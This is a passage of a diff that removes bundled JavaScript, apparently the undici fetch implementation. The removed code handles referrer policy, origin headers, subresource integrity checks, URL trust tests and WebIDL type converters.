(request.responseTainting === 'cors' || request.mode === 'websocket') { - if (serializedOrigin) { - request.headersList.append('origin', serializedOrigin) - } - - // 3. Otherwise, if request’s method is neither `GET` nor `HEAD`, then: - } else if (request.method !== 'GET' && request.method !== 'HEAD') { - // 1. Switch on request’s referrer policy: - switch (request.referrerPolicy) { - case 'no-referrer': - // Set serializedOrigin to `null`. - serializedOrigin = null - break - case 'no-referrer-when-downgrade': - case 'strict-origin': - case 'strict-origin-when-cross-origin': - // If request’s origin is a tuple origin, its scheme is "https", and request’s current URL’s scheme is not "https", then set serializedOrigin to `null`. - if (request.origin && urlHasHttpsScheme(request.origin) && !urlHasHttpsScheme(requestCurrentURL(request))) { - serializedOrigin = null - } - break - case 'same-origin': - // If request’s origin is not same origin with request’s current URL’s origin, then set serializedOrigin to `null`. - if (!sameOrigin(request, requestCurrentURL(request))) { - serializedOrigin = null - } - break - default: - // Do nothing. - } - - if (serializedOrigin) { - // 2. Append (`Origin`, serializedOrigin) to request’s header list. - request.headersList.append('origin', serializedOrigin) - } - } -} - -function coarsenedSharedCurrentTime (crossOriginIsolatedCapability) { - // TODO - return performance.now() -} - -// https://fetch.spec.whatwg.org/#create-an-opaque-timing-info -function createOpaqueTimingInfo (timingInfo) { - return { - startTime: timingInfo.startTime ?? 0, - redirectStartTime: 0, - redirectEndTime: 0, - postRedirectStartTime: timingInfo.startTime ?? 0, - finalServiceWorkerStartTime: 0, - finalNetworkResponseStartTime: 0, - finalNetworkRequestStartTime: 0, - endTime: 0, - encodedBodySize: 0, - decodedBodySize: 0, - finalConnectionTimingInfo: null - } -} - -// https://html.spec.whatwg.org/multipage/origin.html#policy-container -function makePolicyContainer () { - // Note: the fetch spec doesn't make use of embedder policy or CSP list - return { - referrerPolicy: 'strict-origin-when-cross-origin' - } -} - -// https://html.spec.whatwg.org/multipage/origin.html#clone-a-policy-container -function clonePolicyContainer (policyContainer) { - return { - referrerPolicy: policyContainer.referrerPolicy - } -} - -// https://w3c.github.io/webappsec-referrer-policy/#determine-requests-referrer -function determineRequestsReferrer (request) { - // 1. Let policy be request's referrer policy. - const policy = request.referrerPolicy - - // Note: policy cannot (shouldn't) be null or an empty string. - assert(policy) - - // 2. Let environment be request’s client. - - let referrerSource = null - - // 3. Switch on request’s referrer: - if (request.referrer === 'client') { - // Note: node isn't a browser and doesn't implement document/iframes, - // so we bypass this step and replace it with our own. - - const globalOrigin = getGlobalOrigin() - - if (!globalOrigin || globalOrigin.origin === 'null') { - return 'no-referrer' - } - - // note: we need to clone it as it's mutated - referrerSource = new URL(globalOrigin) - } else if (request.referrer instanceof URL) { - // Let referrerSource be request’s referrer. - referrerSource = request.referrer - } - - // 4. Let request’s referrerURL be the result of stripping referrerSource for - // use as a referrer. - let referrerURL = stripURLForReferrer(referrerSource) - - // 5. Let referrerOrigin be the result of stripping referrerSource for use as - // a referrer, with the origin-only flag set to true. - const referrerOrigin = stripURLForReferrer(referrerSource, true) - - // 6. If the result of serializing referrerURL is a string whose length is - // greater than 4096, set referrerURL to referrerOrigin. - if (referrerURL.toString().length > 4096) { - referrerURL = referrerOrigin - } - - const areSameOrigin = sameOrigin(request, referrerURL) - const isNonPotentiallyTrustWorthy = isURLPotentiallyTrustworthy(referrerURL) && - !isURLPotentiallyTrustworthy(request.url) - - // 8. Execute the switch statements corresponding to the value of policy: - switch (policy) { - case 'origin': return referrerOrigin != null ? referrerOrigin : stripURLForReferrer(referrerSource, true) - case 'unsafe-url': return referrerURL - case 'same-origin': - return areSameOrigin ? referrerOrigin : 'no-referrer' - case 'origin-when-cross-origin': - return areSameOrigin ? referrerURL : referrerOrigin - case 'strict-origin-when-cross-origin': { - const currentURL = requestCurrentURL(request) - - // 1. If the origin of referrerURL and the origin of request’s current - // URL are the same, then return referrerURL. - if (sameOrigin(referrerURL, currentURL)) { - return referrerURL - } - - // 2. If referrerURL is a potentially trustworthy URL and request’s - // current URL is not a potentially trustworthy URL, then return no - // referrer. - if (isURLPotentiallyTrustworthy(referrerURL) && !isURLPotentiallyTrustworthy(currentURL)) { - return 'no-referrer' - } - - // 3. Return referrerOrigin. - return referrerOrigin - } - case 'strict-origin': // eslint-disable-line - /** - * 1. If referrerURL is a potentially trustworthy URL and - * request’s current URL is not a potentially trustworthy URL, - * then return no referrer. - * 2. Return referrerOrigin - */ - case 'no-referrer-when-downgrade': // eslint-disable-line - /** - * 1. If referrerURL is a potentially trustworthy URL and - * request’s current URL is not a potentially trustworthy URL, - * then return no referrer. - * 2. Return referrerOrigin - */ - - default: // eslint-disable-line - return isNonPotentiallyTrustWorthy ? 'no-referrer' : referrerOrigin - } -} - -/** - * @see https://w3c.github.io/webappsec-referrer-policy/#strip-url - * @param {URL} url - * @param {boolean|undefined} originOnly - */ -function stripURLForReferrer (url, originOnly) { - // 1. Assert: url is a URL. - assert(url instanceof URL) - - // 2. If url’s scheme is a local scheme, then return no referrer. - if (url.protocol === 'file:' || url.protocol === 'about:' || url.protocol === 'blank:') { - return 'no-referrer' - } - - // 3. Set url’s username to the empty string. - url.username = '' - - // 4. Set url’s password to the empty string. - url.password = '' - - // 5. Set url’s fragment to null. - url.hash = '' - - // 6. If the origin-only flag is true, then: - if (originOnly) { - // 1. Set url’s path to « the empty string ». - url.pathname = '' - - // 2. Set url’s query to null. - url.search = '' - } - - // 7. Return url. - return url -} - -function isURLPotentiallyTrustworthy (url) { - if (!(url instanceof URL)) { - return false - } - - // If child of about, return true - if (url.href === 'about:blank' || url.href === 'about:srcdoc') { - return true - } - - // If scheme is data, return true - if (url.protocol === 'data:') return true - - // If file, return true - if (url.protocol === 'file:') return true - - return isOriginPotentiallyTrustworthy(url.origin) - - function isOriginPotentiallyTrustworthy (origin) { - // If origin is explicitly null, return false - if (origin == null || origin === 'null') return false - - const originAsURL = new URL(origin) - - // If secure, return true - if (originAsURL.protocol === 'https:' || originAsURL.protocol === 'wss:') { - return true - } - - // If localhost or variants, return true - if (/^127(?:\.[0-9]+){0,2}\.[0-9]+$|^\[(?:0*:)*?:?0*1\]$/.test(originAsURL.hostname) || - (originAsURL.hostname === 'localhost' || originAsURL.hostname.includes('localhost.')) || - (originAsURL.hostname.endsWith('.localhost'))) { - return true - } - - // If any other, return false - return false - } -} - -/** - * @see https://w3c.github.io/webappsec-subresource-integrity/#does-response-match-metadatalist - * @param {Uint8Array} bytes - * @param {string} metadataList - */ -function bytesMatch (bytes, metadataList) { - // If node is not built with OpenSSL support, we cannot check - // a request's integrity, so allow it by default (the spec will - // allow requests if an invalid hash is given, as precedence). - /* istanbul ignore if: only if node is built with --without-ssl */ - if (crypto === undefined) { - return true - } - - // 1. Let parsedMetadata be the result of parsing metadataList. - const parsedMetadata = parseMetadata(metadataList) - - // 2. If parsedMetadata is no metadata, return true. - if (parsedMetadata === 'no metadata') { - return true - } - - // 3. If parsedMetadata is the empty set, return true. - if (parsedMetadata.length === 0) { - return true - } - - // 4. Let metadata be the result of getting the strongest - // metadata from parsedMetadata. - const list = parsedMetadata.sort((c, d) => d.algo.localeCompare(c.algo)) - // get the strongest algorithm - const strongest = list[0].algo - // get all entries that use the strongest algorithm; ignore weaker - const metadata = list.filter((item) => item.algo === strongest) - - // 5. For each item in metadata: - for (const item of metadata) { - // 1. Let algorithm be the alg component of item. - const algorithm = item.algo - - // 2. Let expectedValue be the val component of item. - let expectedValue = item.hash - - // See https://github.com/web-platform-tests/wpt/commit/e4c5cc7a5e48093220528dfdd1c4012dc3837a0e - // "be liberal with padding". This is annoying, and it's not even in the spec. - - if (expectedValue.endsWith('==')) { - expectedValue = expectedValue.slice(0, -2) - } - - // 3. Let actualValue be the result of applying algorithm to bytes. - let actualValue = crypto.createHash(algorithm).update(bytes).digest('base64') - - if (actualValue.endsWith('==')) { - actualValue = actualValue.slice(0, -2) - } - - // 4. If actualValue is a case-sensitive match for expectedValue, - // return true. - if (actualValue === expectedValue) { - return true - } - - let actualBase64URL = crypto.createHash(algorithm).update(bytes).digest('base64url') - - if (actualBase64URL.endsWith('==')) { - actualBase64URL = actualBase64URL.slice(0, -2) - } - - if (actualBase64URL === expectedValue) { - return true - } - } - - // 6. Return false. - return false -} - -// https://w3c.github.io/webappsec-subresource-integrity/#grammardef-hash-with-options -// https://www.w3.org/TR/CSP2/#source-list-syntax -// https://www.rfc-editor.org/rfc/rfc5234#appendix-B.1 -const parseHashWithOptions = /((?sha256|sha384|sha512)-(?[A-z0-9+/]{1}.*={0,2}))( +[\x21-\x7e]?)?/i - -/** - * @see https://w3c.github.io/webappsec-subresource-integrity/#parse-metadata - * @param {string} metadata - */ -function parseMetadata (metadata) { - // 1. Let result be the empty set. - /** @type {{ algo: string, hash: string }[]} */ - const result = [] - - // 2. Let empty be equal to true. - let empty = true - - const supportedHashes = crypto.getHashes() - - // 3. For each token returned by splitting metadata on spaces: - for (const token of metadata.split(' ')) { - // 1. Set empty to false. - empty = false - - // 2. Parse token as a hash-with-options. - const parsedToken = parseHashWithOptions.exec(token) - - // 3. If token does not parse, continue to the next token. - if (parsedToken === null || parsedToken.groups === undefined) { - // Note: Chromium blocks the request at this point, but Firefox - // gives a warning that an invalid integrity was given. The - // correct behavior is to ignore these, and subsequently not - // check the integrity of the resource. - continue - } - - // 4. Let algorithm be the hash-algo component of token. - const algorithm = parsedToken.groups.algo - - // 5. If algorithm is a hash function recognized by the user - // agent, add the parsed token to result. - if (supportedHashes.includes(algorithm.toLowerCase())) { - result.push(parsedToken.groups) - } - } - - // 4. Return no metadata if empty is true, otherwise return result. - if (empty === true) { - return 'no metadata' - } - - return result -} - -// https://w3c.github.io/webappsec-upgrade-insecure-requests/#upgrade-request -function tryUpgradeRequestToAPotentiallyTrustworthyURL (request) { - // TODO -} - -/** - * @link {https://html.spec.whatwg.org/multipage/origin.html#same-origin} - * @param {URL} A - * @param {URL} B - */ -function sameOrigin (A, B) { - // 1. If A and B are the same opaque origin, then return true. - if (A.origin === B.origin && A.origin === 'null') { - return true - } - - // 2. If A and B are both tuple origins and their schemes, - // hosts, and port are identical, then return true. - if (A.protocol === B.protocol && A.hostname === B.hostname && A.port === B.port) { - return true - } - - // 3. Return false. - return false -} - -function createDeferredPromise () { - let res - let rej - const promise = new Promise((resolve, reject) => { - res = resolve - rej = reject - }) - - return { promise, resolve: res, reject: rej } -} - -function isAborted (fetchParams) { - return fetchParams.controller.state === 'aborted' -} - -function isCancelled (fetchParams) { - return fetchParams.controller.state === 'aborted' || - fetchParams.controller.state === 'terminated' -} - -const normalizeMethodRecord = { - delete: 'DELETE', - DELETE: 'DELETE', - get: 'GET', - GET: 'GET', - head: 'HEAD', - HEAD: 'HEAD', - options: 'OPTIONS', - OPTIONS: 'OPTIONS', - post: 'POST', - POST: 'POST', - put: 'PUT', - PUT: 'PUT' -} - -// Note: object prototypes should not be able to be referenced. e.g. `Object#hasOwnProperty`. -Object.setPrototypeOf(normalizeMethodRecord, null) - -/** - * @see https://fetch.spec.whatwg.org/#concept-method-normalize - * @param {string} method - */ -function normalizeMethod (method) { - return normalizeMethodRecord[method.toLowerCase()] ?? method -} - -// https://infra.spec.whatwg.org/#serialize-a-javascript-value-to-a-json-string -function serializeJavascriptValueToJSONString (value) { - // 1. Let result be ? Call(%JSON.stringify%, undefined, « value »). - const result = JSON.stringify(value) - - // 2. If result is undefined, then throw a TypeError. - if (result === undefined) { - throw new TypeError('Value is not JSON serializable') - } - - // 3. Assert: result is a string. - assert(typeof result === 'string') - - // 4. Return result. - return result -} - -// https://tc39.es/ecma262/#sec-%25iteratorprototype%25-object -const esIteratorPrototype = Object.getPrototypeOf(Object.getPrototypeOf([][Symbol.iterator]())) - -/** - * @see https://webidl.spec.whatwg.org/#dfn-iterator-prototype-object - * @param {() => unknown[]} iterator - * @param {string} name name of the instance - * @param {'key'|'value'|'key+value'} kind - */ -function makeIterator (iterator, name, kind) { - const object = { - index: 0, - kind, - target: iterator - } - - const i = { - next () { - // 1. Let interface be the interface for which the iterator prototype object exists. - - // 2. Let thisValue be the this value. - - // 3. Let object be ? ToObject(thisValue). - - // 4. If object is a platform object, then perform a security - // check, passing: - - // 5. If object is not a default iterator object for interface, - // then throw a TypeError. - if (Object.getPrototypeOf(this) !== i) { - throw new TypeError( - `'next' called on an object that does not implement interface ${name} Iterator.` - ) - } - - // 6. Let index be object’s index. - // 7. Let kind be object’s kind. - // 8. Let values be object’s target's value pairs to iterate over. - const { index, kind, target } = object - const values = target() - - // 9. Let len be the length of values. - const len = values.length - - // 10. If index is greater than or equal to len, then return - // CreateIterResultObject(undefined, true). - if (index >= len) { - return { value: undefined, done: true } - } - - // 11. Let pair be the entry in values at index index. - const pair = values[index] - - // 12. Set object’s index to index + 1. - object.index = index + 1 - - // 13. Return the iterator result for pair and kind. - return iteratorResult(pair, kind) - }, - // The class string of an iterator prototype object for a given interface is the - // result of concatenating the identifier of the interface and the string " Iterator". - [Symbol.toStringTag]: `${name} Iterator` - } - - // The [[Prototype]] internal slot of an iterator prototype object must be %IteratorPrototype%. - Object.setPrototypeOf(i, esIteratorPrototype) - // esIteratorPrototype needs to be the prototype of i - // which is the prototype of an empty object. Yes, it's confusing. - return Object.setPrototypeOf({}, i) -} - -// https://webidl.spec.whatwg.org/#iterator-result -function iteratorResult (pair, kind) { - let result - - // 1. Let result be a value determined by the value of kind: - switch (kind) { - case 'key': { - // 1. Let idlKey be pair’s key. - // 2. Let key be the result of converting idlKey to an - // ECMAScript value. - // 3. result is key. - result = pair[0] - break - } - case 'value': { - // 1. Let idlValue be pair’s value. - // 2. Let value be the result of converting idlValue to - // an ECMAScript value. - // 3. result is value. - result = pair[1] - break - } - case 'key+value': { - // 1. Let idlKey be pair’s key. - // 2. Let idlValue be pair’s value. - // 3. Let key be the result of converting idlKey to an - // ECMAScript value. - // 4. Let value be the result of converting idlValue to - // an ECMAScript value. - // 5. Let array be ! ArrayCreate(2). - // 6. Call ! CreateDataProperty(array, "0", key). - // 7. Call ! CreateDataProperty(array, "1", value). - // 8. result is array. - result = pair - break - } - } - - // 2. Return CreateIterResultObject(result, false). - return { value: result, done: false } -} - -/** - * @see https://fetch.spec.whatwg.org/#body-fully-read - */ -async function fullyReadBody (body, processBody, processBodyError) { - // 1. If taskDestination is null, then set taskDestination to - // the result of starting a new parallel queue. - - // 2. Let successSteps given a byte sequence bytes be to queue a - // fetch task to run processBody given bytes, with taskDestination. - const successSteps = processBody - - // 3. Let errorSteps be to queue a fetch task to run processBodyError, - // with taskDestination. - const errorSteps = processBodyError - - // 4. Let reader be the result of getting a reader for body’s stream. - // If that threw an exception, then run errorSteps with that - // exception and return. - let reader - - try { - reader = body.stream.getReader() - } catch (e) { - errorSteps(e) - return - } - - // 5. Read all bytes from reader, given successSteps and errorSteps. - try { - const result = await readAllBytes(reader) - successSteps(result) - } catch (e) { - errorSteps(e) - } -} - -/** @type {ReadableStream} */ -let ReadableStream = globalThis.ReadableStream - -function isReadableStreamLike (stream) { - if (!ReadableStream) { - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - return stream instanceof ReadableStream || ( - stream[Symbol.toStringTag] === 'ReadableStream' && - typeof stream.tee === 'function' - ) -} - -const MAXIMUM_ARGUMENT_LENGTH = 65535 - -/** - * @see https://infra.spec.whatwg.org/#isomorphic-decode - * @param {number[]|Uint8Array} input - */ -function isomorphicDecode (input) { - // 1. To isomorphic decode a byte sequence input, return a string whose code point - // length is equal to input’s length and whose code points have the same values - // as the values of input’s bytes, in the same order. - - if (input.length < MAXIMUM_ARGUMENT_LENGTH) { - return String.fromCharCode(...input) - } - - return input.reduce((previous, current) => previous + String.fromCharCode(current), '') -} - -/** - * @param {ReadableStreamController} controller - */ -function readableStreamClose (controller) { - try { - controller.close() - } catch (err) { - // TODO: add comment explaining why this error occurs. - if (!err.message.includes('Controller is already closed')) { - throw err - } - } -} - -/** - * @see https://infra.spec.whatwg.org/#isomorphic-encode - * @param {string} input - */ -function isomorphicEncode (input) { - // 1. Assert: input contains no code points greater than U+00FF. - for (let i = 0; i < input.length; i++) { - assert(input.charCodeAt(i) <= 0xFF) - } - - // 2. Return a byte sequence whose length is equal to input’s code - // point length and whose bytes have the same values as the - // values of input’s code points, in the same order - return input -} - -/** - * @see https://streams.spec.whatwg.org/#readablestreamdefaultreader-read-all-bytes - * @see https://streams.spec.whatwg.org/#read-loop - * @param {ReadableStreamDefaultReader} reader - */ -async function readAllBytes (reader) { - const bytes = [] - let byteLength = 0 - - while (true) { - const { done, value: chunk } = await reader.read() - - if (done) { - // 1. Call successSteps with bytes. - return Buffer.concat(bytes, byteLength) - } - - // 1. If chunk is not a Uint8Array object, call failureSteps - // with a TypeError and abort these steps. - if (!isUint8Array(chunk)) { - throw new TypeError('Received non-Uint8Array chunk') - } - - // 2. Append the bytes represented by chunk to bytes. - bytes.push(chunk) - byteLength += chunk.length - - // 3. Read-loop given reader, bytes, successSteps, and failureSteps. - } -} - -/** - * @see https://fetch.spec.whatwg.org/#is-local - * @param {URL} url - */ -function urlIsLocal (url) { - assert('protocol' in url) // ensure it's a url object - - const protocol = url.protocol - - return protocol === 'about:' || protocol === 'blob:' || protocol === 'data:' -} - -/** - * @param {string|URL} url - */ -function urlHasHttpsScheme (url) { - if (typeof url === 'string') { - return url.startsWith('https:') - } - - return url.protocol === 'https:' -} - -/** - * @see https://fetch.spec.whatwg.org/#http-scheme - * @param {URL} url - */ -function urlIsHttpHttpsScheme (url) { - assert('protocol' in url) // ensure it's a url object - - const protocol = url.protocol - - return protocol === 'http:' || protocol === 'https:' -} - -/** - * Fetch supports node >= 16.8.0, but Object.hasOwn was added in v16.9.0. - */ -const hasOwn = Object.hasOwn || ((dict, key) => Object.prototype.hasOwnProperty.call(dict, key)) - -module.exports = { - isAborted, - isCancelled, - createDeferredPromise, - ReadableStreamFrom, - toUSVString, - tryUpgradeRequestToAPotentiallyTrustworthyURL, - coarsenedSharedCurrentTime, - determineRequestsReferrer, - makePolicyContainer, - clonePolicyContainer, - appendFetchMetadata, - appendRequestOriginHeader, - TAOCheck, - corsCheck, - crossOriginResourcePolicyCheck, - createOpaqueTimingInfo, - setRequestReferrerPolicyOnRedirect, - isValidHTTPToken, - requestBadPort, - requestCurrentURL, - responseURL, - responseLocationURL, - isBlobLike, - isURLPotentiallyTrustworthy, - isValidReasonPhrase, - sameOrigin, - normalizeMethod, - serializeJavascriptValueToJSONString, - makeIterator, - isValidHeaderName, - isValidHeaderValue, - hasOwn, - isErrorLike, - fullyReadBody, - bytesMatch, - isReadableStreamLike, - readableStreamClose, - isomorphicEncode, - isomorphicDecode, - urlIsLocal, - urlHasHttpsScheme, - urlIsHttpHttpsScheme, - readAllBytes, - normalizeMethodRecord -} - - -/***/ }), - -/***/ 1744: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { types } = __nccwpck_require__(3837) -const { hasOwn, toUSVString } = __nccwpck_require__(2538) - -/** @type {import('../../types/webidl').Webidl} */ -const webidl = {} -webidl.converters = {} -webidl.util = {} -webidl.errors = {} - -webidl.errors.exception = function (message) { - return new TypeError(`${message.header}: ${message.message}`) -} - -webidl.errors.conversionFailed = function (context) { - const plural = context.types.length === 1 ? '' : ' one of' - const message = - `${context.argument} could not be converted to` + - `${plural}: ${context.types.join(', ')}.` - - return webidl.errors.exception({ - header: context.prefix, - message - }) -} - -webidl.errors.invalidArgument = function (context) { - return webidl.errors.exception({ - header: context.prefix, - message: `"${context.value}" is an invalid ${context.type}.` - }) -} - -// https://webidl.spec.whatwg.org/#implements -webidl.brandCheck = function (V, I, opts = undefined) { - if (opts?.strict !== false && !(V instanceof I)) { - throw new TypeError('Illegal invocation') - } else { - return V?.[Symbol.toStringTag] === I.prototype[Symbol.toStringTag] - } -} - -webidl.argumentLengthCheck = function ({ length }, min, ctx) { - if (length < min) { - throw webidl.errors.exception({ - message: `${min} argument${min !== 1 ? 's' : ''} required, ` + - `but${length ? ' only' : ''} ${length} found.`, - ...ctx - }) - } -} - -webidl.illegalConstructor = function () { - throw webidl.errors.exception({ - header: 'TypeError', - message: 'Illegal constructor' - }) -} - -// https://tc39.es/ecma262/#sec-ecmascript-data-types-and-values -webidl.util.Type = function (V) { - switch (typeof V) { - case 'undefined': return 'Undefined' - case 'boolean': return 'Boolean' - case 'string': return 'String' - case 'symbol': return 'Symbol' - case 'number': return 'Number' - case 'bigint': return 'BigInt' - case 'function': - case 'object': { - if (V === null) { - return 'Null' - } - - return 'Object' - } - } -} - -// https://webidl.spec.whatwg.org/#abstract-opdef-converttoint -webidl.util.ConvertToInt = function (V, bitLength, signedness, opts = {}) { - let upperBound - let lowerBound - - // 1. If bitLength is 64, then: - if (bitLength === 64) { - // 1. Let upperBound be 2^53 − 1. - upperBound = Math.pow(2, 53) - 1 - - // 2. If signedness is "unsigned", then let lowerBound be 0. - if (signedness === 'unsigned') { - lowerBound = 0 - } else { - // 3. Otherwise let lowerBound be −2^53 + 1. - lowerBound = Math.pow(-2, 53) + 1 - } - } else if (signedness === 'unsigned') { - // 2. Otherwise, if signedness is "unsigned", then: - - // 1. Let lowerBound be 0. - lowerBound = 0 - - // 2. Let upperBound be 2^bitLength − 1. - upperBound = Math.pow(2, bitLength) - 1 - } else { - // 3. Otherwise: - - // 1. Let lowerBound be -2^bitLength − 1. - lowerBound = Math.pow(-2, bitLength) - 1 - - // 2. Let upperBound be 2^bitLength − 1 − 1. - upperBound = Math.pow(2, bitLength - 1) - 1 - } - - // 4. Let x be ? ToNumber(V). - let x = Number(V) - - // 5. If x is −0, then set x to +0. - if (x === 0) { - x = 0 - } - - // 6. If the conversion is to an IDL type associated - // with the [EnforceRange] extended attribute, then: - if (opts.enforceRange === true) { - // 1. If x is NaN, +∞, or −∞, then throw a TypeError. - if ( - Number.isNaN(x) || - x === Number.POSITIVE_INFINITY || - x === Number.NEGATIVE_INFINITY - ) { - throw webidl.errors.exception({ - header: 'Integer conversion', - message: `Could not convert ${V} to an integer.` - }) - } - - // 2. Set x to IntegerPart(x). - x = webidl.util.IntegerPart(x) - - // 3. If x < lowerBound or x > upperBound, then - // throw a TypeError. - if (x < lowerBound || x > upperBound) { - throw webidl.errors.exception({ - header: 'Integer conversion', - message: `Value must be between ${lowerBound}-${upperBound}, got ${x}.` - }) - } - - // 4. Return x. - return x - } - - // 7. If x is not NaN and the conversion is to an IDL - // type associated with the [Clamp] extended - // attribute, then: - if (!Number.isNaN(x) && opts.clamp === true) { - // 1. Set x to min(max(x, lowerBound), upperBound). - x = Math.min(Math.max(x, lowerBound), upperBound) - - // 2. Round x to the nearest integer, choosing the - // even integer if it lies halfway between two, - // and choosing +0 rather than −0. - if (Math.floor(x) % 2 === 0) { - x = Math.floor(x) - } else { - x = Math.ceil(x) - } - - // 3. Return x. - return x - } - - // 8. If x is NaN, +0, +∞, or −∞, then return +0. - if ( - Number.isNaN(x) || - (x === 0 && Object.is(0, x)) || - x === Number.POSITIVE_INFINITY || - x === Number.NEGATIVE_INFINITY - ) { - return 0 - } - - // 9. Set x to IntegerPart(x). - x = webidl.util.IntegerPart(x) - - // 10. Set x to x modulo 2^bitLength. - x = x % Math.pow(2, bitLength) - - // 11. If signedness is "signed" and x ≥ 2^bitLength − 1, - // then return x − 2^bitLength. - if (signedness === 'signed' && x >= Math.pow(2, bitLength) - 1) { - return x - Math.pow(2, bitLength) - } - - // 12. Otherwise, return x. - return x -} - -// https://webidl.spec.whatwg.org/#abstract-opdef-integerpart -webidl.util.IntegerPart = function (n) { - // 1. Let r be floor(abs(n)). - const r = Math.floor(Math.abs(n)) - - // 2. If n < 0, then return -1 × r. - if (n < 0) { - return -1 * r - } - - // 3. Otherwise, return r. - return r -} - -// https://webidl.spec.whatwg.org/#es-sequence -webidl.sequenceConverter = function (converter) { - return (V) => { - // 1. If Type(V) is not Object, throw a TypeError. - if (webidl.util.Type(V) !== 'Object') { - throw webidl.errors.exception({ - header: 'Sequence', - message: `Value of type ${webidl.util.Type(V)} is not an Object.` - }) - } - - // 2. Let method be ? GetMethod(V, @@iterator). - /** @type {Generator} */ - const method = V?.[Symbol.iterator]?.() - const seq = [] - - // 3. If method is undefined, throw a TypeError. - if ( - method === undefined || - typeof method.next !== 'function' - ) { - throw webidl.errors.exception({ - header: 'Sequence', - message: 'Object is not an iterator.' - }) - } - - // https://webidl.spec.whatwg.org/#create-sequence-from-iterable - while (true) { - const { done, value } = method.next() - - if (done) { - break - } - - seq.push(converter(value)) - } - - return seq - } -} - -// https://webidl.spec.whatwg.org/#es-to-record -webidl.recordConverter = function (keyConverter, valueConverter) { - return (O) => { - // 1. If Type(O) is not Object, throw a TypeError. - if (webidl.util.Type(O) !== 'Object') { - throw webidl.errors.exception({ - header: 'Record', - message: `Value of type ${webidl.util.Type(O)} is not an Object.` - }) - } - - // 2. Let result be a new empty instance of record. - const result = {} - - if (!types.isProxy(O)) { - // Object.keys only returns enumerable properties - const keys = Object.keys(O) - - for (const key of keys) { - // 1. Let typedKey be key converted to an IDL value of type K. - const typedKey = keyConverter(key) - - // 2. Let value be ? Get(O, key). - // 3. Let typedValue be value converted to an IDL value of type V. - const typedValue = valueConverter(O[key]) - - // 4. Set result[typedKey] to typedValue. - result[typedKey] = typedValue - } - - // 5. Return result. - return result - } - - // 3. Let keys be ? O.[[OwnPropertyKeys]](). - const keys = Reflect.ownKeys(O) - - // 4. For each key of keys. - for (const key of keys) { - // 1. Let desc be ? O.[[GetOwnProperty]](key). - const desc = Reflect.getOwnPropertyDescriptor(O, key) - - // 2. If desc is not undefined and desc.[[Enumerable]] is true: - if (desc?.enumerable) { - // 1. Let typedKey be key converted to an IDL value of type K. - const typedKey = keyConverter(key) - - // 2. Let value be ? Get(O, key). - // 3. Let typedValue be value converted to an IDL value of type V. - const typedValue = valueConverter(O[key]) - - // 4. Set result[typedKey] to typedValue. - result[typedKey] = typedValue - } - } - - // 5. Return result. - return result - } -} - -webidl.interfaceConverter = function (i) { - return (V, opts = {}) => { - if (opts.strict !== false && !(V instanceof i)) { - throw webidl.errors.exception({ - header: i.name, - message: `Expected ${V} to be an instance of ${i.name}.` - }) - } - - return V - } -} - -webidl.dictionaryConverter = function (converters) { - return (dictionary) => { - const type = webidl.util.Type(dictionary) - const dict = {} - - if (type === 'Null' || type === 'Undefined') { - return dict - } else if (type !== 'Object') { - throw webidl.errors.exception({ - header: 'Dictionary', - message: `Expected ${dictionary} to be one of: Null, Undefined, Object.` - }) - } - - for (const options of converters) { - const { key, defaultValue, required, converter } = options - - if (required === true) { - if (!hasOwn(dictionary, key)) { - throw webidl.errors.exception({ - header: 'Dictionary', - message: `Missing required key "${key}".` - }) - } - } - - let value = dictionary[key] - const hasDefault = hasOwn(options, 'defaultValue') - - // Only use defaultValue if value is undefined and - // a defaultValue options was provided. - if (hasDefault && value !== null) { - value = value ?? defaultValue - } - - // A key can be optional and have no default value. - // When this happens, do not perform a conversion, - // and do not assign the key a value. - if (required || hasDefault || value !== undefined) { - value = converter(value) - - if ( - options.allowedValues && - !options.allowedValues.includes(value) - ) { - throw webidl.errors.exception({ - header: 'Dictionary', - message: `${value} is not an accepted type. Expected one of ${options.allowedValues.join(', ')}.` - }) - } - - dict[key] = value - } - } - - return dict - } -} - -webidl.nullableConverter = function (converter) { - return (V) => { - if (V === null) { - return V - } - - return converter(V) - } -} - -// https://webidl.spec.whatwg.org/#es-DOMString -webidl.converters.DOMString = function (V, opts = {}) { - // 1. If V is null and the conversion is to an IDL type - // associated with the [LegacyNullToEmptyString] - // extended attribute, then return the DOMString value - // that represents the empty string. - if (V === null && opts.legacyNullToEmptyString) { - return '' - } - - // 2. Let x be ? ToString(V). - if (typeof V === 'symbol') { - throw new TypeError('Could not convert argument of type symbol to string.') - } - - // 3. Return the IDL DOMString value that represents the - // same sequence of code units as the one the - // ECMAScript String value x represents. - return String(V) -} - -// https://webidl.spec.whatwg.org/#es-ByteString -webidl.converters.ByteString = function (V) { - // 1. Let x be ? ToString(V). - // Note: DOMString converter perform ? ToString(V) - const x = webidl.converters.DOMString(V) - - // 2. If the value of any element of x is greater than - // 255, then throw a TypeError. - for (let index = 0; index < x.length; index++) { - if (x.charCodeAt(index) > 255) { - throw new TypeError( - 'Cannot convert argument to a ByteString because the character at ' + - `index ${index} has a value of ${x.charCodeAt(index)} which is greater than 255.` - ) - } - } - - // 3. Return an IDL ByteString value whose length is the - // length of x, and where the value of each element is - // the value of the corresponding element of x. - return x -} - -// https://webidl.spec.whatwg.org/#es-USVString -webidl.converters.USVString = toUSVString - -// https://webidl.spec.whatwg.org/#es-boolean -webidl.converters.boolean = function (V) { - // 1. Let x be the result of computing ToBoolean(V). - const x = Boolean(V) - - // 2. Return the IDL boolean value that is the one that represents - // the same truth value as the ECMAScript Boolean value x. - return x -} - -// https://webidl.spec.whatwg.org/#es-any -webidl.converters.any = function (V) { - return V -} - -// https://webidl.spec.whatwg.org/#es-long-long -webidl.converters['long long'] = function (V) { - // 1. Let x be ? ConvertToInt(V, 64, "signed"). - const x = webidl.util.ConvertToInt(V, 64, 'signed') - - // 2. Return the IDL long long value that represents - // the same numeric value as x. - return x -} - -// https://webidl.spec.whatwg.org/#es-unsigned-long-long -webidl.converters['unsigned long long'] = function (V) { - // 1. Let x be ? ConvertToInt(V, 64, "unsigned"). - const x = webidl.util.ConvertToInt(V, 64, 'unsigned') - - // 2. Return the IDL unsigned long long value that - // represents the same numeric value as x. - return x -} - -// https://webidl.spec.whatwg.org/#es-unsigned-long -webidl.converters['unsigned long'] = function (V) { - // 1. Let x be ? ConvertToInt(V, 32, "unsigned"). - const x = webidl.util.ConvertToInt(V, 32, 'unsigned') - - // 2. Return the IDL unsigned long value that - // represents the same numeric value as x. - return x -} - -// https://webidl.spec.whatwg.org/#es-unsigned-short 